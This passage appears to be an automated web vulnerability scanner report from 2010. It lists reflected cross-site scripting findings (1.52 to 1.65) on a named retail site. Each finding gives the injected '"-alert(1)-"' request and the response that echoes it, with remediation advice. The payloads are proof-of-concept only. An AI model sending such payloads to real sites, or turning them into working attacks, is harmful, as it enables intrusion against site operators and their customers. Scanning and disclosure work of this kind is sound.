pageTracker._trackPageview("/customercare/information/?24020"-alert(1)-"c2e99d599f1=1");
//]]>
...[SNIP]...

1.52. http://www.fredperry.com/customercare/ordertracking/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/ordertracking/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba55f"-alert(1)-"94d3f8d094a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercareba55f"-alert(1)-"94d3f8d094a/ordertracking/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=31u97j9kf5mgjd7o8iqk5h5f92; expires=Tue, 09-Nov-2010 17:18:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercareba55f"-alert(1)-"94d3f8d094a/ordertracking/");
//]]>
...[SNIP]...

1.53. http://www.fredperry.com/customercare/ordertracking/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/ordertracking/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e908c"-alert(1)-"ff1f4769767 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/ordertrackinge908c"-alert(1)-"ff1f4769767/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tqjjko9svnmmijvl6ki4ckt6l4; expires=Tue, 09-Nov-2010 17:18:24 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/ordertrackinge908c"-alert(1)-"ff1f4769767/");
//]]>
...[SNIP]...

1.54. http://www.fredperry.com/customercare/ordertracking/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/ordertracking/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab65d"-alert(1)-"b8038686cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/ordertracking/?ab65d"-alert(1)-"b8038686cc=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3nvha52q3f1fd5147u49c3m3i1; expires=Tue, 09-Nov-2010 17:17:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Order T
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/ordertracking/?ab65d"-alert(1)-"b8038686cc=1");
//]]>
...[SNIP]...

1.55. http://www.fredperry.com/customercare/returns/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/returns/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 949c8"-alert(1)-"04627fbb78f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare949c8"-alert(1)-"04627fbb78f/returns/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vhqebjmfv1o1birdugll8iu0h4; expires=Tue, 09-Nov-2010 17:19:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare949c8"-alert(1)-"04627fbb78f/returns/");
//]]>
...[SNIP]...

1.56. http://www.fredperry.com/customercare/returns/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/returns/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91a56"-alert(1)-"c8df448cb36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/returns91a56"-alert(1)-"c8df448cb36/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=uj4chm4hhumhmvvm1k7503vl73; expires=Tue, 09-Nov-2010 17:19:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/returns91a56"-alert(1)-"c8df448cb36/");
//]]>
...[SNIP]...

1.57. http://www.fredperry.com/customercare/returns/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/returns/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ff83"-alert(1)-"be4f89bb799 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/returns/?4ff83"-alert(1)-"be4f89bb799=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=pivkvr5qittpcl1jhb08msmhs2; expires=Tue, 09-Nov-2010 17:18:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Returns
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/returns/?4ff83"-alert(1)-"be4f89bb799=1");
//]]>
...[SNIP]...

1.58. http://www.fredperry.com/footwear/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cffc"-alert(1)-"62f4b0a691c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear8cffc"-alert(1)-"62f4b0a691c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:03:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=er03stn5g3auh22ne9eev5a085; expires=Tue, 09-Nov-2010 17:03:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear8cffc"-alert(1)-"62f4b0a691c/");
//]]>
...[SNIP]...

1.59. http://www.fredperry.com/footwear/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfbdc"-alert(1)-"ce09f5b9080 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear/?bfbdc"-alert(1)-"ce09f5b9080=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:01:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1fvvphdfq79bvvkmf81jq6p373; expires=Tue, 09-Nov-2010 17:01:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> footwea
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear/?bfbdc"-alert(1)-"ce09f5b9080=1");
//]]>
...[SNIP]...

1.60. http://www.fredperry.com/footwear/men/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/men/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18143"-alert(1)-"e6c8aea808b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear18143"-alert(1)-"e6c8aea808b/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:03:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=huq0q65u4sj1fui2uj3fk73st0; expires=Tue, 09-Nov-2010 17:03:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear18143"-alert(1)-"e6c8aea808b/men/");
//]]>
...[SNIP]...

1.61. http://www.fredperry.com/footwear/men/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/men/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f12a"-alert(1)-"42752903dcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear/men5f12a"-alert(1)-"42752903dcc/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:03:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=334i604v3jd1ug35amqrq6l7u1; expires=Tue, 09-Nov-2010 17:03:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear/men5f12a"-alert(1)-"42752903dcc/");
//]]>
...[SNIP]...

1.62. http://www.fredperry.com/footwear/men/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/men/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9db67"-alert(1)-"5e26043ec8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear/men/?9db67"-alert(1)-"5e26043ec8f=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:01:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vuvttoa5vopkerom16e92pksb7; expires=Tue, 09-Nov-2010 17:01:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's F
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear/men/?9db67"-alert(1)-"5e26043ec8f=1");
//]]>
...[SNIP]...

1.63. http://www.fredperry.com/footwear/women/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2be5b"-alert(1)-"e5744c4501f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear2be5b"-alert(1)-"e5744c4501f/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:03:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=96c2h4h8g79gg428a0hbandns1; expires=Tue, 09-Nov-2010 17:03:25 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear2be5b"-alert(1)-"e5744c4501f/women/");
//]]>
...[SNIP]...

1.64. http://www.fredperry.com/footwear/women/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/women/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd108"-alert(1)-"bc1e04530ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear/womencd108"-alert(1)-"bc1e04530ca/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:03:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=15409u7iamhegudvk9knvhonk7; expires=Tue, 09-Nov-2010 17:03:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear/womencd108"-alert(1)-"bc1e04530ca/");
//]]>
...[SNIP]...

1.65. http://www.fredperry.com/footwear/women/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/women/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0969"-alert(1)-"29b7f4c9995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear/women/?e0969"-alert(1)-"29b7f4c9995=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:01:46 GMT
Server: Apache/2.2.3 (Red Hat)
